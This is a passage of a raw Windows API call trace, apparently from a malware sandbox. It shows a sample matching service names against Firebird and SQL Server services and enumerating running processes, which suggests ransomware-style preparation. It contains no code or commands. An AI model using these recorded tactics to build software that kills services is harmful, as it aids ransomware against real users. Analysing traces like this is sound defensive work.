lstrlenW (lpString="EventLog") returned 8 [0191.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0191.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0191.910] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0191.910] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0191.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0191.910] lstrlenW (lpString="EventSystem") returned 11 [0191.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0191.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0191.910] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0191.910] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0191.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0191.910] lstrlenW (lpString="FontCache") returned 9 [0191.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0191.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0191.910] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0191.910] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0191.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0191.910] lstrlenW (lpString="gpsvc") returned 5 [0191.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0191.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0191.910] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0191.910] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0191.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0191.910] lstrlenW (lpString="iphlpsvc") returned 8 [0191.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0191.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0191.910] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0191.911] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0191.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0191.911] lstrlenW (lpString="KeyIso") returned 6 [0191.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0191.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0191.911] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0191.911] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0191.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0191.911] lstrlenW (lpString="LanmanServer") returned 12 [0191.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0191.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0191.911] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0191.911] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0191.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0191.911] lstrlenW (lpString="LanmanWorkstation") returned 17 [0191.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0191.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0191.911] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0191.911] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0191.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0191.911] lstrlenW (lpString="lfsvc") returned 5 [0191.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0191.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0191.911] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0191.911] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0191.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0191.911] lstrlenW (lpString="LicenseManager") returned 14 [0191.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0191.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0191.911] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0191.911] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0191.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0191.911] lstrlenW (lpString="lmhosts") returned 7 [0191.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0191.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0191.911] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0191.911] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0191.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0191.912] lstrlenW (lpString="LSM") returned 3 [0191.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0191.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0191.912] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0191.912] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0191.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0191.912] lstrlenW (lpString="MpsSvc") returned 6 [0191.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0191.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0191.912] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0191.912] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0191.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0191.912] lstrlenW (lpString="NcbService") returned 10 [0191.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0191.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0191.912] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0191.912] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0191.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0191.912] lstrlenW (lpString="netprofm") returned 8 [0191.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0191.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0191.912] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0191.912] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0191.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0191.912] lstrlenW (lpString="NlaSvc") returned 6 [0191.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0191.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0191.912] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0191.912] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0191.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0191.912] lstrlenW (lpString="nsi") returned 3 [0191.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0191.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0191.912] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0191.912] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0191.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0191.912] lstrlenW (lpString="PcaSvc") returned 6 [0191.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0191.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0191.913] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0191.913] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0191.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0191.913] lstrlenW (lpString="PlugPlay") returned 8 [0191.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0191.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0191.913] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0191.913] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0191.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0191.913] lstrlenW (lpString="Power") returned 5 [0191.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0191.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0191.913] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0191.913] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0191.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0191.913] lstrlenW (lpString="ProfSvc") returned 7 [0191.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0191.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0191.913] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0191.913] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0191.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0191.913] lstrlenW (lpString="RpcEptMapper") returned 12 [0191.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0191.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0191.913] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0191.913] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0191.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0191.913] lstrlenW (lpString="RpcSs") returned 5 [0191.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0191.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0191.913] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0191.913] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0191.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0191.913] lstrlenW (lpString="SamSs") returned 5 [0191.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0191.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0191.913] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0191.914] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0191.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0191.914] lstrlenW (lpString="Schedule") returned 8 [0191.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0191.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0191.914] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0191.914] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0191.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0191.914] lstrlenW (lpString="SecurityHealthService") returned 21 [0191.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0191.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0191.914] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0191.914] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0191.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0191.914] lstrlenW (lpString="SENS") returned 4 [0191.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0191.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0191.914] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0191.914] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0191.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0191.914] lstrlenW (lpString="ShellHWDetection") returned 16 [0191.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0191.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0191.914] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0191.914] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0191.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0191.914] lstrlenW (lpString="Spooler") returned 7 [0191.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0191.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0191.914] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0191.914] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0191.914] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0191.914] lstrlenW (lpString="sppsvc") returned 6 [0191.914] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0191.914] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0191.914] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0191.914] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0191.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0191.915] lstrlenW (lpString="SSDPSRV") returned 7 [0191.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0191.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0191.915] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0191.915] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0191.915] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0191.975] Process32FirstW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.975] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.976] lstrlenW (lpString="System") returned 6 [0191.976] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.106] lstrlenW (lpString="smss.exe") returned 8 [0192.106] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.107] lstrlenW (lpString="csrss.exe") returned 9 [0192.107] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.108] lstrlenW (lpString="wininit.exe") returned 11 [0192.108] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.109] lstrlenW (lpString="csrss.exe") returned 9 [0192.109] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.110] lstrlenW (lpString="winlogon.exe") returned 12 [0192.110] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.111] lstrlenW (lpString="services.exe") returned 12 [0192.111] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.112] lstrlenW (lpString="lsass.exe") returned 9 [0192.112] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.113] lstrlenW (lpString="svchost.exe") returned 11 [0192.113] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0192.114] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0192.114] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0192.114] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0192.114] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.115] lstrlenW (lpString="svchost.exe") returned 11 [0192.115] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.116] lstrlenW (lpString="dwm.exe") returned 7 [0192.116] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.117] lstrlenW (lpString="svchost.exe") returned 11 [0192.117] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.118] lstrlenW (lpString="svchost.exe") returned 11 [0192.118] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.119] lstrlenW (lpString="svchost.exe") returned 11 [0192.119] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.120] lstrlenW (lpString="svchost.exe") returned 11 [0192.120] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.121] lstrlenW (lpString="svchost.exe") returned 11 [0192.121] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.122] lstrlenW (lpString="svchost.exe") returned 11 [0192.122] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.123] lstrlenW (lpString="svchost.exe") returned 11 [0192.123] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.123] lstrlenW (lpString="svchost.exe") returned 11 [0192.123] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.124] lstrlenW (lpString="svchost.exe") returned 11 [0192.124] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.125] lstrlenW (lpString="spoolsv.exe") returned 11 [0192.125] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.126] lstrlenW (lpString="svchost.exe") returned 11 [0192.126] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.127] lstrlenW (lpString="svchost.exe") returned 11 [0192.127] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.128] lstrlenW (lpString="audiodg.exe") returned 11 [0192.128] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0192.129] lstrlenW (lpString="sihost.exe") returned 10 [0192.129] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.130] lstrlenW (lpString="svchost.exe") returned 11 [0192.130] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0192.131] lstrlenW (lpString="taskhostw.exe") returned 13 [0192.131] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0192.131] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0192.131] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0192.132] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0192.132] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, 